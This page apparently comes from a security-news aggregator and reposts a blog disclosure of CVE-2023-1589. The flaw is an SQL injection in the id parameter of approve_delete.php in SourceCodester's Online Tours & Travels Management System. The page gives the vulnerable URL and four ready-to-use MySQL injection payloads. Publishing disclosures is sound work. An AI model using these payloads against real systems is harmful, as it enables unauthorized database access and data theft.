Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-1589: SourceCodester Online Tours & Travels Management System approve_delete.php sql injection_@sec的博客-CSDN博客

A vulnerability has been found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This vulnerability affects the function exec of the file admin/operations/approve_delete.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-223654 is the identifier assigned to this vulnerability.

CVE
Open in Source
#sql#vulnerability#php

@sec 于 2023-03-23 14:19:26 发布 15 收藏

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

SourceCodester Online Tours & Travels Management System approve_delete.php sql injection

Url: admin/operations/approve_delete.php

Abstract:

Line 19 of approve_delete.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.

  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to exec() in approve_delete.php on line 19.

http://localhost/OTMSP-Final-source-code/sourcecode/tour/admin/operations/approve_delete.php?id=111





Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=111' RLIKE (SELECT (CASE WHEN (4667=4667) THEN 111 ELSE 0x28 END))-- lhaO

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=111' AND GTID_SUBSET(CONCAT(0x7178787a71,(SELECT (ELT(8710=8710,1))),0x7162787671),8710)-- bkLB

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=111';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: id=111' AND 6617=BENCHMARK(5000000,MD5(0x594c6e67))-- jult

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE